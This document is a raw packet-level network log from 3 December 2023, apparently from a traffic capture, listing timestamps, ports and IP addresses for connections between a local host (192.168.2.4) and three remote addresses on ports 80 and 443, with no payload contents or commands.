Dec 3, 2023 17:22:52.010329008 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010350943 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010350943 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010376930 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010616064 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.010680914 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.010704041 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.010720968 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.055000067 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.055160999 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.073451042 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.073697090 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.232325077 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.232464075 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.241560936 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.241588116 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.241604090 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.241621017 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.241630077 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.241650105 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.241658926 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.241677046 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.241719961 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.241753101 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.241790056 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.242875099 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.242917061 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.242944956 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.242960930 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.243730068 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.243768930 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.243810892 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.243854046 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.244149923 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.244167089 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.244189024 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.244203091 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.244247913 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.244286060 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.247106075 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.247163057 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.248404980 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.248454094 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.248672009 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.248688936 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.248713017 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.248728037 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.249361038 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.249401093 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.249476910 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.249514103 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.249573946 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.249614954 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.249764919 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.249806881 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.249871016 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.249908924 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.250905991 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.250946999 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.250992060 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.251032114 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.252090931 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.252130032 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.253321886 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.253360033 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.253385067 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.253405094 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.253556967 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.253573895 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.253596067 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.253612995 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.253670931 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.253709078 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.253856897 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.253895044 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.253948927 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.253987074 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.254160881 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.254199028 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.254364967 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.254405975 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.254623890 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.254641056 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.254662037 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.254704952 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.254791975 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.254817009 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.254965067 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.255223036 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255300999 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255312920 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.255359888 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255417109 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.255418062 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255485058 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255503893 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.255551100 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255606890 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255672932 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.255686998 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255745888 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255765915 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.255801916 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.255815029 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255872965 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255873919 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.255935907 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.255991936 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.256064892 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.256086111 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.256105900 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.256150007 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.256150007 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.256227970 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.256267071 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.289661884 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.289855957 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.309333086 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.309600115 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.468036890 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.468200922 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.481180906 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.481360912 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.486272097 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.486331940 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.487281084 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.487351894 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.487409115 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.487446070 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.487468958 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.487493992 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.487943888 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.487978935 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.488019943 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.488019943 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.488080025 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.488472939 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.488532066 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.488532066 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.488532066 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.488532066 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.488733053 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.488786936 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.489702940 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.489761114 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.489814997 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.489867926 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.490008116 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.490063906 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.490314007 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.490365982 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.491386890 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.491444111 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.494427919 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.494487047 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.494508982 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.494563103 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.494935989 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.495028973 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.495100021 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.495273113 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.495273113 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.497786999 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.497824907 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.497905970 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.497982979 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.497982979 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.498048067 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.498048067 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.498085976 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.498141050 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.498141050 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.498188972 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500415087 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500415087 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500457048 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500524044 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.500559092 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.500606060 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500633001 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500669956 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.500758886 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500801086 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500829935 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500895977 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.500935078 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.525449991 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.525571108 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.525649071 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.545133114 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.545217991 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.712956905 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.713115931 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.716888905 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.716964006 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.721709967 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.721781015 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.722783089 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.722846031 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.723392963 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.723472118 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.723494053 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.723547935 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.723825932 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.723860979 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.723891973 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.723896980 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.723918915 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.723932028 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.723953009 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.723964930 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.723987103 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.724020004 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.724247932 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.724301100 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.725410938 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.725476980 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.726839066 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.726897001 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.729669094 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.729722977 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.730690956 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.730743885 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.730772018 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.730788946 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.730819941 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.730827093 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.730835915 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.730873108 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.732253075 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.732300997 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.732860088 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.732877016 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.732902050 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.732907057 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.732918024 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.732927084 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.732942104 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.732953072 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.733298063 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.733367920 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.733422995 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.733474016 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.733524084 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.733552933 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.733570099 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.733588934 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.733644009 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.733686924 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.733953953 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.733969927 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.733998060 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.734013081 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.734168053 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.734214067 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.734273911 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.734318972 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.734488010 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.734555960 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.734590054 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.734595060 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.734648943 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.734692097 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:52.734838009 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.734958887 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735218048 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735233068 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735333920 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735605955 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735650063 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735752106 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735769033 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735846043 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.735882998 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.736148119 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.736179113 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.736193895 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.736336946 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.736469984 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.737459898 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.738455057 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.739124060 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.760051012 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.760843039 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.779670954 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.903615952 CET	80	49729	208.95.112.1	192.168.2.4
Dec 3, 2023 17:22:52.903750896 CET	49729	80	192.168.2.4	208.95.112.1
Dec 3, 2023 17:22:52.947770119 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.959427118 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.961277962 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.965429068 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.965481043 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:52.970474005 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:54.185440063 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:54.185503960 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:54.185563087 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:54.185563087 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:54.523978949 CET	49738	80	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:54.652724981 CET	80	49738	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:54.653081894 CET	49738	80	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:54.677720070 CET	49738	80	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:54.806345940 CET	80	49738	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:54.820837975 CET	80	49738	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:54.821054935 CET	49738	80	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:54.833359003 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:54.833399057 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:54.833483934 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:54.843655109 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:54.843688011 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.123516083 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.123784065 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.256033897 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.256098032 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.256467104 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.256537914 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.258758068 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.301264048 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443120956 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443254948 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443340063 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443347931 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.443392992 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443443060 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.443443060 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.443466902 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443516970 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.443530083 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443586111 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.443597078 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443653107 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.443662882 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.443718910 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.443950891 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.444005966 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.444041014 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.444093943 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.444129944 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.444180012 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:22:55.444211960 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:22:55.444283962 CET	49739	443	192.168.2.4	162.159.130.233
